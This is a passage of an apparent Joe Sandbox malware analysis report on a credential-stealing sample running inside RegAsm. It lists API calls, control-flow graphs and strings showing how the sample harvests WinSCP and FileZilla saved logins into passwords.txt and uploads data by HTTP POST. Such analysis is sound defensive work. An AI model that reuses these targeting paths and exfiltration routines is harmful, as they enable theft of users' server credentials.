                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C37B
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C38C
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,0040EAF6), ref: 0040C3AE
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C3EF
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,0040EAF6), ref: 0040C427
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset$Open$Value
                                                                                                                                                                                                                                                    • String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 2608732736-1250616252
                                                                                                                                                                                                                                                    • Opcode ID: 84f0a8c8484ba34b70e54d8db9e4517a8c939116ec80965e7da635ccf1c304d2
                                                                                                                                                                                                                                                    • Instruction ID: cbda87958c2d1559049c9a5e39ac49dd90b106e9b4a90716c584001952143c95
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84f0a8c8484ba34b70e54d8db9e4517a8c939116ec80965e7da635ccf1c304d2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AED18EB1A0022AEFDB10EBE4CD85EFF777DEB58704F10456AF505B3280D6785A488B65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040C770 Relevance: 73.9, APIs: 31, Strings: 11, Instructions: 398stringmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 89 40c770-40c842 call 40fcd0 call 411530 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fd10 call 406d60 112 40c848-40c85a call 411590 89->112 113 40cc7a-40ccbf call 40fd50 * 4 89->113 112->113 119 40c860-40c8d1 strtok_s call 40fcd0 * 4 GetProcessHeap HeapAlloc 112->119 133 40c8d7 119->133 134 40cbcd-40cc75 lstrlenA call 40fcd0 call 401060 call 415250 call 40fd50 memset call 40ff20 * 4 call 40fd50 * 4 119->134 135 40c8e0-40c8ee StrStrA 133->135 134->113 137 40c8f0-40c91d lstrlenA call 411a10 call 40fdb0 call 40fd50 135->137 138 40c922-40c930 StrStrA 135->138 137->138 141 40c932-40c965 lstrlenA call 411a10 call 40fdb0 call 40fd50 138->141 142 40c96a-40c978 StrStrA 138->142 141->142 144 40c9b2-40c9c0 StrStrA 142->144 145 40c97a-40c9ad lstrlenA call 411a10 call 40fdb0 call 40fd50 142->145 152 40c9c6-40ca13 lstrlenA call 411a10 call 40fdb0 call 40fd50 call 40ff70 call 406e30 144->152 153 40ca4a-40ca5c call 40ff70 lstrlenA 144->153 145->144 152->153 195 40ca15-40ca45 call 40fd60 call 40fe90 call 40fdb0 call 40fd50 152->195 167 40cbb1-40cbc7 strtok_s 153->167 168 40ca62-40ca74 call 40ff70 lstrlenA 153->168 167->134 167->135 168->167 181 40ca7a-40ca8c call 40ff70 lstrlenA 168->181 181->167 190 40ca92-40caa4 call 40ff70 lstrlenA 181->190 190->167 199 40caaa-40cbac lstrcat * 2 call 40ff70 lstrcat * 2 call 40ff70 lstrcat * 3 call 40ff70 lstrcat * 3 call 40ff70 lstrcat * 3 call 40fd60 * 4 190->199 195->153 199->167
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 00411590: LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 0040C869
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00426966,00426963,00426962,0042695F), ref: 0040C8BF
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8C6
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040C8E6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8F1
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: malloc.MSVCRT ref: 00411A21
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: strncpy.MSVCRT ref: 00411A31
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040C928
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C933
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040C970
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C97B
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040C9B8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9C7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA6B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA83
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Soft: FileZilla), ref: 0040CAB3
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Host: ), ref: 0040CAC2
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CAD5
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D38), ref: 0040CAE4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CAF7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D3C), ref: 0040CB06
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Login: ), ref: 0040CB15
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CB28
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D48), ref: 0040CB37
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Password: ), ref: 0040CB46
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CB59
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D58), ref: 0040CB68
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D5C), ref: 0040CB77
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 0040CBBB
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00417CD9,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBD1
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040CC22
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$niBkiBjiB$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 433178851-3004004793
                                                                                                                                                                                                                                                    • Opcode ID: 1373f8e8692b112c6ea9e6b1d99b5f9c17d77ad09afe90e3f6a463c4a80c99c6
                                                                                                                                                                                                                                                    • Instruction ID: b57454810d6304676497751934f7ea3bd1d565fdd6c3d061aa416f4a09d76235
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1373f8e8692b112c6ea9e6b1d99b5f9c17d77ad09afe90e3f6a463c4a80c99c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93E18C75900218AACB14EBE4DD4AFEEBB78AF15704F50447EF502731D2DF786A08CA69
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00404D60 Relevance: 67.3, APIs: 23, Strings: 15, Instructions: 789networkstringmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 228 404d60-404e79 call 40fd10 call 404350 call 4115e0 call 40ff70 lstrlenA call 40ff70 call 4115e0 call 40fcd0 * 5 StrCmpCA 251 404e82-404e87 228->251 252 404e7b 228->252 253 4056ba-4056f9 call 411240 * 2 call 40ff20 * 4 call 40fd10 251->253 254 404e8d-404fb4 call 411310 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fe00 call 40fe90 call 40fdb0 call 40fd50 * 3 call 40fe90 call 40fe00 call 40fdb0 call 40fd50 * 2 InternetConnectA 251->254 252->251 282 4056fe-405783 call 40fd50 * 9 253->282 254->253 321 404fba-404ff2 HttpOpenRequestA 254->321 322 4056b3-4056b4 InternetCloseHandle 321->322 323 404ff8-404ffc 321->323 322->253 324 405014-405609 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 402360 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40ff70 lstrlenA call 40ff70 lstrlenA GetProcessHeap HeapAlloc call 40ff70 lstrlenA call 40ff70 memcpy call 40ff70 lstrlenA memcpy call 40ff70 lstrlenA call 40ff70 * 2 lstrlenA memcpy call 40ff70 lstrlenA call 40ff70 HttpSendRequestA call 411240 HttpQueryInfoA 323->324 325 404ffe-40500e InternetSetOptionA 323->325 532 40560b-40561a call 40fcd0 324->532 533 40561f-405633 call 411210 324->533 325->324 532->282 538 405784-405793 call 40fcd0 533->538 539 405639-405652 InternetReadFile 533->539 538->282 541 405654-405659 539->541 542 4056a9-4056b0 InternetCloseHandle 539->542 541->542 543 40565b-4056a7 call 40fe90 call 40fdb0 call 40fd50 InternetReadFile 541->543 542->322 543->541 543->542
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404DE6
                                                                                                                                                                                                                                                      • Part of subcall function 004115E0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411604
                                                                                                                                                                                                                                                      • Part of subcall function 004115E0: GetProcessHeap.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411613
                                                                                                                                                                                                                                                      • Part of subcall function 004115E0: HeapAlloc.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041161A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,004266CF,004266CB,004266C3,004266BF,004266BE), ref: 00404E71
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FA7
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,015CF640,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00404FE8
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040500E
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,015CF080,00000000,?,00426788,00000000,?,?), ref: 00405506
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405518
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040552B
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00405532
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405544
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00405558
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405571
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040557B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040558C
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004055A5
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004055B2
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000), ref: 004055C8
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004055D9
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405601
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 0040564A
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040569F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004056AA
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004056B4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$Internet$lstrcpy$Heap$Httpmemcpy$AllocCloseFileHandleProcessReadRequestlstrcat$BinaryConnectCrackCryptInfoOpenOptionQuerySendString
                                                                                                                                                                                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$build_id$file_data
                                                                                                                                                                                                                                                    • API String ID: 1552553701-1805485788
                                                                                                                                                                                                                                                    • Opcode ID: 36288343b13bcecf3f3343ce157e6e3581ff12686f309abd99186f30baf50d53
                                                                                                                                                                                                                                                    • Instruction ID: ab71994ed1295a43bc8c3dd8a783d46a99ab3c159837bd77a07e11315958c144
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36288343b13bcecf3f3343ce157e6e3581ff12686f309abd99186f30baf50d53
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5624E75800248EACB15EBE5C955AEEBBB8AF18704F50407EE502735D2DB386B4CCB79
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00405BC0 Relevance: 58.4, APIs: 21, Strings: 12, Instructions: 681networkstringmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 565 405bc0-405cb2 call 40fd10 call 404350 call 40fcd0 * 5 call 40ff70 InternetOpenA StrCmpCA 582 405cb4 565->582 583 405cbb-405cbd 565->583 582->583 584 405cc3-405e41 call 411310 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fe00 call 40fdb0 call 40fd50 * 2 InternetConnectA 583->584 585 40639f-4063c0 InternetCloseHandle call 40ff70 call 406e30 583->585 669 405e47-405e7f HttpOpenRequestA 584->669 670 40639c 584->670 595 4063c2-4063ef call 40fd60 call 40fe90 call 40fdb0 call 40fd50 585->595 596 4063f4-40647c call 411240 * 2 call 40fd50 * 8 585->596 595->596 671 406395-406396 InternetCloseHandle 669->671 672 405e85-405e89 669->672 670->585 671->670 673 405ea1-406330 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 402360 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40ff70 lstrlenA call 40ff70 lstrlenA GetProcessHeap HeapAlloc call 40ff70 lstrlenA call 40ff70 memcpy call 40ff70 lstrlenA call 40ff70 * 2 lstrlenA memcpy call 40ff70 lstrlenA call 40ff70 HttpSendRequestA InternetReadFile 672->673 674 405e8b-405e9b InternetSetOptionA 672->674 835 406332-406337 673->835 836 406388-406392 InternetCloseHandle 673->836 674->673 835->836 837 406339-406386 call 40fe90 call 40fdb0 call 40fd50 InternetReadFile 835->837 836->671 837->835 837->836
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C8A
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405E34
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,015CF640,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00405E74
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,0041FDD1,?,00000000,0041FDD1,",00000000,0041FDD1,mode,00000000,0041FDD1,015CF080,00000000,0041FDD1,00426808), ref: 00406272
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406283
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040628E
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406295
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004062A6
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004062B7
